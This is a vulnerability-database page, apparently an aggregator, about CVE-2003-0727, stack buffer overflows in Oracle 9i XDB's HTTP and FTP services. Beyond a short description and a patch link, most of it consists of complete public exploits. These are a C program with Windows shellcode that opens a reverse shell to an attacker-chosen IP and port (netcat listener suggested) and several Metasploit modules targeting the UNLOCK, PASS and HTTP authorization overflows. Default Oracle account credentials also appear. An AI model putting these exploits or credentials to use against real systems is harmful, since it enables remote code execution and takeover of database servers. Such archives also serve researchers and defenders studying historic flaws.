CVE-2003-0727
CVSS 2.1
Published: 2003-10-20 00:00:00
Revised: 2008-09-10 15:20:19

[Original] Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.


[CNNVD] Oracle XDB FTP/HTTP Service Multiple Buffer Overflow Vulnerabilities (CNNVD-200310-071)

        
        Oracle XDB is the Oracle XML Database introduced with Oracle 9i. XDB content is reachable over an HTTP service on TCP port 8080 and an FTP service on TCP port 2100.
        Both the HTTP and the FTP service contain multiple buffer overflows. A remote attacker can use them to crash the service (denial of service), and a carefully constructed string can execute arbitrary code with the privileges of the database service process.
        The individual issues are:
        - XDB HTTP overlong username or password:
        Using the web-based XDB service requires authentication; the credentials are passed to the server Base64-encoded (HTTP Basic authentication). An overlong username or password supplied by an attacker causes a stack-based buffer overflow.
        - XDB FTP overlong username or password:
        Submitting an overlong username or password to the XDB FTP service causes a stack-based buffer overflow.
        - XDB FTP TEST command, insufficient argument checking:
        The XDB FTP service supports most standard FTP commands. The TEST command lacks proper bounds checking on its argument; an overlong argument sent to the FTP service causes a buffer overflow.
        - XDB FTP UNLOCK command, insufficient argument checking:
        The UNLOCK command likewise lacks bounds checking on its argument; an overlong argument sent to the FTP service causes a buffer overflow.
        Note that the NVD scoring recorded below (access vector LOCAL, score 2.1) does not match this description or the Bugtraq and OSVDB records further down, which class the issue as remotely exploitable: both services listen on the network, and every public exploit on this page connects to TCP 8080 or 2100 from a remote host.
        

- CVSS (base score)

CVSS score: 2.1 [LOW] (vector AV:L/AC:L/Au:N/C:N/I:N/A:P)
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0727
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-071
(official data source) CNNVD

- Other links and resources

http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf
(UNKNOWN) CONFIRM

- Vulnerability information

Oracle XDB FTP/HTTP Service Multiple Buffer Overflow Vulnerabilities
Severity: Low   Class: Boundary Condition Error
Published: 2003-10-20 00:00:00   Updated: 2006-10-06 00:00:00
Remote / Local
Description: identical to the CNNVD description above.

- Advisories and patches

        Vendor patch:
        Oracle
        ------
        The vendor has released a patch (Oracle Security Alert 58) for this issue; obtain it from the vendor's site:

        http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf

- Vulnerability information (80)

Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit (EDBID:80)
Platform: windows   Type: remote
Date: 2003-08-13   Verified
Port: 2100   Author: David Litchfield
Vulnerable app: N/A
/*  Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit                        */
/*  David Litchfield from ngssoftware (at Blackhat 2003)                         */
/*                                                                               */
/*  Original Advisory:                                                           */
/*  http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf  */


#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* strncpy, strcat, strlen */
#include <ctype.h>    /* isalpha */
#include <windows.h>
#include <winsock.h>  /* link with wsock32.lib */

int GainControlOfOracle(char *, char *); 
int StartWinsock(void); 
int SetUpExploit(char *,int); 

struct sockaddr_in s_sa; 
struct hostent *he; 
unsigned int addr; 
char host[260]="";

unsigned char exploit[508]= 
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF" 
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50" 
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C" 
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89" 
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13" 
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC" 
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C" 
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89" 
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83" 
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33" 
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A" 
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66" 
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45" 
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0" 
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84" 
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57" 
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50" 
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8" 
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03" 
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83" 
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41" 
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03" 
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3" 
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C" 
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8" 
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B" 
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B" 
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF" 
"\xFF\xFF\xFF\xFF"; 

char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";


char exception_handler[8]="\x79\x9B\xf7\x77"; 
char short_jump[8]="\xEB\x06\x90\x90"; 


int main(int argc, char *argv[]) 
{ 
if(argc != 6) 
{ 
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 
printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); 
printf("\n\n\tSpawns a reverse shell to specified port"); 
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); 
printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
printf("\n\t6th July 2003\n\n\n"); 
return 0; 
} 
strncpy(host,argv[1],250); 
if(StartWinsock()==0) 
return printf("Error starting Winsock.\n"); 
SetUpExploit(argv[4],atoi(argv[5])); 
strcat(exploit_code,short_jump); 
strcat(exploit_code,exception_handler); 
strcat(exploit_code,exploit); 
strcat(exploit_code,"\r\n"); 


GainControlOfOracle(argv[2],argv[3]); 
return 0; 
} 


int SetUpExploit(char *myip, int myport) 
{ 
unsigned int ip=0; 
unsigned short prt=0; 
char *ipt=""; 
char *prtt=""; 


ip = inet_addr(myip); 
ipt = (char*)&ip; 
exploit[191]=ipt[0]; 
exploit[192]=ipt[1]; 
exploit[193]=ipt[2]; 
exploit[194]=ipt[3]; 
// set the TCP port to connect on 
// netcat should be listening on this port 
// e.g. nc -l -p 80 

prt = htons((unsigned short)myport); 
prt = prt ^ 0xFFFF; 
prtt = (char *) &prt; 
exploit[209]=prtt[0]; 
exploit[210]=prtt[1]; 
return 0; 
} 


int StartWinsock() { 
int err=0; WORD wVersionRequested; 
WSADATA wsaData; 
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err != 0 ) 
return 0; 

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) 
{ WSACleanup( ); 
return 0; } 


if (isalpha(host[0])) {
he = gethostbyname(host);
if (he == NULL) /* unresolvable name: check before dereferencing he */
return 0;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
}
return 1; }


int GainControlOfOracle(char *user, char *pass) { 
char usercmd[260]="user "; 
char passcmd[260]="pass "; 
char resp[1600]=""; 
int snd=0,rcv=0; 
struct sockaddr_in r_addr; 
SOCKET sock; 


strncat(usercmd,user,230); 
strcat(usercmd,"\r\n"); 
strncat(passcmd,pass,230); 
strcat(passcmd,"\r\n"); 


sock=socket(AF_INET,SOCK_STREAM,0); 
if (sock==INVALID_SOCKET) 
return printf(" sock error"); 
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; 
r_addr.sin_port=htons((unsigned short)0);

s_sa.sin_port=htons((unsigned short)2100); 
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error"); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); 
ZeroMemory(resp,1600); 
snd=send(sock, usercmd , strlen(usercmd) , 0); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); ZeroMemory(resp,1600); 


snd=send(sock, passcmd , strlen(passcmd) , 0); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); 
if(resp[0]=='5') 
{ closesocket(sock); 
return printf("Failed to log in using user %s and password %s.\n",user,pass); 
} 
ZeroMemory(resp,1600); 
snd=send(sock, exploit_code, strlen(exploit_code) , 0); 
Sleep(2000); 
closesocket(sock); 
return 0; 
}

// milw0rm.com [2003-08-13]
		

- Vulnerability information (1365)

Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit (EDBID:1365)
Platform: windows   Type: remote
Date: 2005-12-08   Verified
Port: 8080   Author: y0
Vulnerable app: N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'  => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
	'Version'  => '$Revision: 1.1 $',
	'Authors' => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8080],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	  
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'Payload' =>
	  {
		'Space'     => 450,
		'BadChars'  => "\x00",
		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a stack overflow in the authorization
		code of the Oracle 9i HTTP XDB service. David Litchfield
		has illustrated multiple vulnerabilities in the Oracle
		9i XML Database (XDB), during a seminar on "Variations
		in exploit methods between Linux and Windows" presented
		at the Blackhat conference.
}),

	'Refs'  =>   [
		['BID', '8375'],
		['CVE', '2003-0727'],
		['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
	  ],

	'DefaultTarget' => 0,
	'Targets' => [

		['Oracle 9.2.0.1 Universal', 0x60616d46],

	  ],

	'Keys' => ['oracle'],

	'DisclosureDate' => 'Aug 18 2003',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my ($self) = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("GET / HTTP/1.0\r\n\r\n");
	my $res = $s->Recv(-1, 20);
	$s->Close();

	if ($res !~ /9\.2\.0\.1\.0/) {
		$self->PrintLine("[*] This server does not appear to be vulnerable.");
		return $self->CheckCode('Safe');
	}

	$self->PrintLine("[*] Vulnerable installation detected :-)");
	return $self->CheckCode('Detected');
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $offset      = $self->GetVar('OFFSET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $splat =
	  "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
	  pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
	  $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;

	my $sploit =
	  "GET / HTTP/1.1". "\r\n".
	  "Host: $target_host:$target_port". "\r\n".
	  "User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
	  "en-US; rv:1.7.12) Gecko/20050923". "\r\n".
	  "Accept: text/xml,application/xml,application".
	  "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
	  "image/png,*/*;q=0.5". "\r\n".
	  "Accept-Language: en-us,en;q=0.5". "\r\n".
	  "Accept-Encoding: gzip,deflate". "\r\n".
	  "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
	  "Keep-Alive: 300". "\r\n".
	  "Connection: keep-alive". "\r\n".
	  "Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
	  "\r\n\r\n";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;


# milw0rm.com [2005-12-08]
		

- Vulnerability information (16714)

Oracle 9i XDB FTP UNLOCK Overflow (win32) (EDBID:16714)
Platform: windows   Type: remote
Date: 2010-10-05   Verified
Port: 2100   Author: metasploit
Vulnerable app: N/A
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
			'Description'    => %q{
					By passing an overly long token to the UNLOCK command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference. Oracle9i includes a number of default accounts,
				including dbsnmp:dbsmp, scott:tiger, system:manager, and
				sys:change_on_install.
			},
			'Author'         => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'Platform'       => [ 'win' ],
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
							'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

		register_options([
			Opt::RPORT(2100),
			OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
			OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
		], self.class )
	end

	def check
		connect
		disconnect
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(1130, payload_badchars)
		seh = generate_seh_payload(target.ret)
		buf[322, seh.length] = seh

		send_cmd( ['UNLOCK', '/', buf] , false )

		handler
		disconnect
	end

end
		

- Vulnerability information (16731)

Oracle 9i XDB FTP PASS Overflow (win32) (EDBID:16731)
Platform: win32   Type: remote
Date: 2010-04-30   Verified
Port: 0   Author: metasploit
Vulnerable app: N/A
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
			'Description'    => %q{
					By passing an overly long string to the PASS command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
									'Platform' => 'win',
									'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

		register_options([Opt::RPORT(2100),], self.class)
		deregister_options('FTPUSER', 'FTPPASS')
	end


	def check
		connect
		disconnect
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		user   = rand_text_alpha_upper(10)
		sploit =  rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)
		sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded

		print_status("Trying target #{target.name}...")

		send_cmd( ['USER', user], true )
		send_cmd( ['PASS', sploit], false )

		handler
		disconnect
	end

end
		

- Vulnerability information (16809)

Oracle 9i XDB HTTP PASS Overflow (win32) (EDBID:16809)
Platform: win32   Type: remote
Date: 2010-09-20   Verified
Port: 8080   Author: metasploit
Vulnerable app: N/A
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the authorization
				code of the Oracle 9i HTTP XDB service. David Litchfield,
				has illustrated multiple vulnerabilities in the Oracle
				9i XML Database (XDB), during a seminar on "Variations
				in exploit methods between Linux and Windows" presented
				at the Blackhat conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2003-0727'],
					['OSVDB', '2449'],
					['BID', '8375'],
					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 18 2003'))

		register_options(
			[
				Opt::RPORT(8080)
			], self.class )
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /9.2.0.1.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit =  rand_text_english(4, payload_badchars) + ":"
		sploit << rand_text_english(442, payload_badchars)
		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"

		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req

		print_status("Trying target %s..." % target.name)

		sock.put(res)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83144)

Oracle 9i XDB FTP PASS Overflow (win32) (PacketStormID:F83144)
Posted: 2009-11-26 00:00:00
Author: MC   Site: metasploit.com
Tags: exploit, overflow, vulnerability
Systems: linux, windows
CVE-2003-0727

By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
			'Description'    => %q{
				By passing an overly long string to the PASS command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",	
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
									'Platform' => 'win',
									'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

			register_options([Opt::RPORT(2100),], self.class)
			deregister_options('FTPUSER', 'FTPPASS')

	end

	
	def check
		connect
		disconnect	
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		user   = rand_text_alpha_upper(10)
		sploit =  rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) 
		sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded
	
		print_status("Trying target #{target.name}...")	
	
		send_cmd( ['USER', user], true )
		send_cmd( ['PASS', sploit], false )
		
		handler
		disconnect
	end

end
    

- Vulnerability information (F82958)

Oracle 9i XDB FTP UNLOCK Overflow (win32) (PacketStormID:F82958)
Posted: 2009-11-26 00:00:00
Authors: David Litchfield, MC   Site: metasploit.com
Tags: exploit, overflow
CVE-2003-0727

By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
			'Description'    => %q{
				By passing an overly long token to the UNLOCK command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference. Oracle9i includes a number of default accounts,
				including dbsnmp:dbsmp, scott:tiger, system:manager, and
				sys:change_on_install.
					
			},
			'Author'         => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},	
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
					[ 
						'Oracle 9.2.0.1 Universal',
						{
							'Platform' => 'win',
							'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret) 
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

			register_options( [
						Opt::RPORT(2100),
						OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
						OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
					], self.class )
	end

	def check
		connect
		disconnect	
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login
		
		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1130, payload_badchars)
		seh          = generate_seh_payload(target.ret) 
		buf[322, seh.length] = seh

		send_cmd( ['UNLOCK', '/', buf] , false )
		
		handler
		disconnect
	end

end
    

